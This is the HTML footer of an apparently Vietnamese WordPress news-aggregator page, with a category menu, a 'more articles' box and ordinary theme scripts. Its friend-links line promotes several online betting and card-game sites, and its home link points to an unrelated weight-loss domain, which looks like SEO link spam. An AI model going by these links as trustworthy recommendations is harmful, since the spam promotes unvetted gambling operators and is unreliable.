chúng tôi: <a href="mailto:hethongvetinhtintuc@gmail.com">hethongvetinhtintuc@gmail.com</a></div></div><div class="footer-social-wrap td-social-style-2"> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Behance"> <i class="td-icon-font td-icon-behance"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Vimeo"> <i class="td-icon-font td-icon-vimeo"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="VKontakte"> <i class="td-icon-font td-icon-vk"></i> </a> </span></div></div> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span td-sub-footer-menu"> <div class="menu-tin-tuc-container"><ul id="menu-tin-tuc-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first td-menu-item td-normal-menu menu-item-11"><a href="http://bestweightlosspills2015.com">Trang chủ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5021"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/suc-khoe">Sức khỏe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-661"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/giao-duc">Giáo dục</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-660"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/du-lich">Du lịch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-663"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/oto-xemay">Ôtô- xe máy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-665"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/the-thao">Thể thao</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-662"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/kinh-doanh">Kinh doanh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-658"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/nha-dat">Nhà đất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1751"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/phap-luat">Pháp luật</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4512"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/thoi-trang">Thời trang</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-659"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/cong-nghe">Công nghệ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1750"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/giai-tri">Giải trí</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5024"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/noi-ngoai-that">Nội ngoại thất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5025"><a href="https://click.driverfortnigtly.ga/GMtCh34S/category/san-pham-dich-vu">Sản phẩm – dịch vụ</a></li> </ul></div> </div> <div class="td-pb-span td-sub-footer-copy"> © Trang tin tức được tổng hợp liên tục hằng ngày từ nhiều nguồn khác nhau. Trang web đang chạy thử nghiệm và chờ xin giấy phép của BTTTT. </br> Link bạn bè: <a href="https://fabet.asia/" target="_blank" title = "nhà cái FABET">https://fabet.asia/</a> <a href="https://linkvaolode88.com" title="Link Vào Nhà Cái Lode88">https://linkvaolode88.com</a> , <a href="https://nhacaiuytin247.com/fabet" title="Link vào nhà cái Fabet - Nha Cai Uy Tin 247">https://nhacaiuytin247.com/fabet</a> , <a href="https://oxbet.icu" title="Oxbet.com – Link vào Oxbet – Tải Game Oxbet – Nhà cái Oxbet, Ox Bet uy tín hay lừa đảo">https://oxbet.icu</a> , <a href="https://gamebai.club/" target="_blank" title = "game bài">https://gamebai.club/</a> , </div> </div> </div> </div> </div><!--close td-outer-wrap--> <div class="td-more-articles-box"> <i class="td-icon-close td-close-more-articles-box"></i> <span class="td-more-articles-box-title">NHIỀU BÀI VIẾT HƠN</span> <div class="td-content-more-articles-box"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/sua-bep-tu-tai-nha-cam-ket-loi-het-dut-diem-nhanh-chong-nhe.html" rel="bookmark" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé"><img width="100" height="70" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-100x70.jpg" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-100x70.jpg 100w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-218x150.jpg 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-696x497.jpg 696w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02.jpg 700w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-bep-tu-02-588x420.jpg 588w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/sua-bep-tu-tai-nha-cam-ket-loi-het-dut-diem-nhanh-chong-nhe.html" rel="bookmark" title="Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm nhanh chóng nhé">Sửa bếp từ tại nhà cam kết lỗi hết dứt điểm...</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-17T08:06:01+00:00" >17 Tháng Sáu, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"><img width="100" height="70" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/nha-dat/can-ho-cao-cap-hateco-laroma-bo-tri-hop-ly.html" rel="bookmark" title="Căn hộ cao cấp Hateco Laroma bố trí hợp lý">Căn hộ cao cấp Hateco Laroma bố trí hợp lý</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-15T08:00:40+00:00" >15 Tháng Sáu, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/khac-phuc-may-giat-tai-nha-dam-bao-loi-dut-diem-nhanh-chong.html" rel="bookmark" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng"><img width="100" height="70" class="entry-thumb" src="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-100x70.jpg" srcset="https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-100x70.jpg 100w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-218x150.jpg 218w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-696x497.jpg 696w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13.jpg 700w, https://click.driverfortnigtly.ga/GMtCh34S/wp-content/uploads/2021/06/sua-may-giat-13-588x420.jpg 588w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://click.driverfortnigtly.ga/GMtCh34S/san-pham-dich-vu/khac-phuc-may-giat-tai-nha-dam-bao-loi-dut-diem-nhanh-chong.html" rel="bookmark" title="Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm nhanh chóng">Khắc phục máy giặt tại nhà đảm bảo lỗi dứt điểm...</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-06-12T07:49:08+00:00" >12 Tháng Sáu, 2021</time></span> </div> </div> </div> </div> </div> <!-- Theme: Newspaper by tagDiv.com 2017 Version: 7.8.1 (rara) Deploy mode: deploy uid: 60d3ea6a4d0c0 --> <script type='text/javascript' src='http://click.driverfortnigtly.ga/GMtCh34S/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.8.1'></script> <script type='text/javascript' src='http://click.driverfortnigtly.ga/GMtCh34S/wp-includes/js/comment-reply.min.js?ver=4.9.18'></script> <script type='text/javascript' src='http://click.driverfortnigtly.ga/GMtCh34S/wp-includes/js/wp-embed.min.js?ver=4.9.18'></script> <script async="async" type='text/javascript' src='http://click.driverfortnigtly.ga/GMtCh34S/wp-content/plugins/akismet/_inc/form.js?ver=4.1.6'></script> <!-- JS generated by theme --> <script> (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'http://click.driverfortnigtly.ga/GMtCh34S/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'http://click.driverfortnigtly.ga/GMtCh34S/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> </body> </html>